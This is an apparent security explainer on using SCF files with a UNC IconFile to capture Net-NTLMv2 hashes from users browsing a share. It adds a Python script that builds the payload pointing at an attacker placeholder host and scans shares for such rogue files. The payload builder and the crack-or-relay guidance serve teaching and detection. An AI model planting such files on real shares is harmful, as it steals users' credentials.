How can an attacker use SCF files on a file server to steal NTLMv2 hashes?
An attacker who can write to a share that users browse drops a small SCF (Shell Command File) there whose `IconFile` entry is a UNC path to a host the attacker controls, for example a Responder or Impacket `smbserver` listener. SCF files are shortcut-like text files whose icon Windows Explorer renders from the path named in `IconFile`, so as soon as a user merely lists the folder, Explorer connects to that UNC path over SMB and, because a domain user is logged on, completes NTLM authentication automatically; the file never has to be opened. The attacker's server records the NTLMv2 challenge-response (the Net-NTLMv2 "hash"), which can then be cracked offline (hashcat mode 5600) or, where SMB signing is not enforced, relayed to another host. Note that this is the challenge-response, not the NT hash itself, so it cannot be used for pass-the-hash. This technique is detailed in Penetration Techniques - Using Icon Files to Obtain NTLMv2 Hash from File Server Connections.
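As an added example (not code from the original page or from the referenced article), the Python script below builds the SCF payload the answer describes and, on the defensive side, scans a constructed share listing for `.scf` files whose `IconFile` points at a host that is not an approved file server. The listener address 10.0.0.5, the file and share names, and the trusted-host list are all assumptions made for the demo.

```python
import configparser
import re
from typing import Dict, List, Optional, Set, Tuple

# Placeholder for an attacker-controlled SMB listener (assumption for this example).
ATTACKER_UNC_ICON = "\\\\10.0.0.5\\share\\icon.ico"


def build_scf(icon_path: str) -> str:
    """Return the text of a minimal SCF file whose icon is loaded from icon_path.

    Explorer draws the icon of every .scf file when a folder is merely listed,
    so a UNC IconFile makes the victim's machine open an SMB session to that
    host and authenticate with the logged-on user's credentials.
    """
    return (
        "[Shell]\r\n"
        "Command=2\r\n"
        f"IconFile={icon_path}\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    )


# \\host\share\... : capture the host component of a UNC path.
_UNC_HOST = re.compile(r"^\\\\([^\\]+)(?:\\|$)")


def icon_host(scf_text: str) -> Optional[str]:
    """Return the host named by the SCF's IconFile if it is a UNC path, else None.

    A local path (C:\\...) produces no SMB traffic and is reported as None.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(scf_text)
    except configparser.Error:
        return None  # not INI-shaped; Explorer would not find an IconFile either
    for section in parser.sections():
        if section.lower() != "shell":
            continue
        # option lookup is case-insensitive in configparser
        icon = parser.get(section, "IconFile", fallback="").strip()
        match = _UNC_HOST.match(icon)
        return match.group(1) if match else None
    return None


def find_rogue_scf(listing: Dict[str, str], trusted_hosts: Set[str]) -> List[Tuple[str, str]]:
    """Scan a {filename: contents} share listing for .scf files that would
    make clients authenticate to a host outside trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    hits: List[Tuple[str, str]] = []
    for name, text in sorted(listing.items()):
        if not name.lower().endswith(".scf"):
            continue
        host = icon_host(text)
        if host is not None and host.lower() not in trusted:
            hits.append((name, host))
    return hits


# Constructed share listing for the demo; none of these files is real.
SAMPLE_SHARE = {
    "Quarterly Report.docx": "PK\x03\x04...",                              # not an SCF, ignored
    "Show Desktop.scf": build_scf("\\\\fileserver01\\icons\\desktop.ico"),  # icon on an approved server
    "@readme.scf": build_scf(ATTACKER_UNC_ICON),                            # '@' sorts first, so the icon is always drawn
    "local.scf": build_scf("C:\\Windows\\explorer.exe"),                     # local icon, no SMB connection
}

if __name__ == "__main__":
    print(build_scf(ATTACKER_UNC_ICON))
    for name, host in find_rogue_scf(SAMPLE_SHARE, {"fileserver01"}):
        print(f"rogue SCF: {name!r} makes clients authenticate to {host}")
```

Running `find_rogue_scf` over a real share means reading each `.scf` file's contents into the listing; the scan deliberately ignores local icon paths, since only a UNC `IconFile` causes outbound SMB authentication.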
NTLMv2 hash, SCF file, SMB, packet capture, UNC path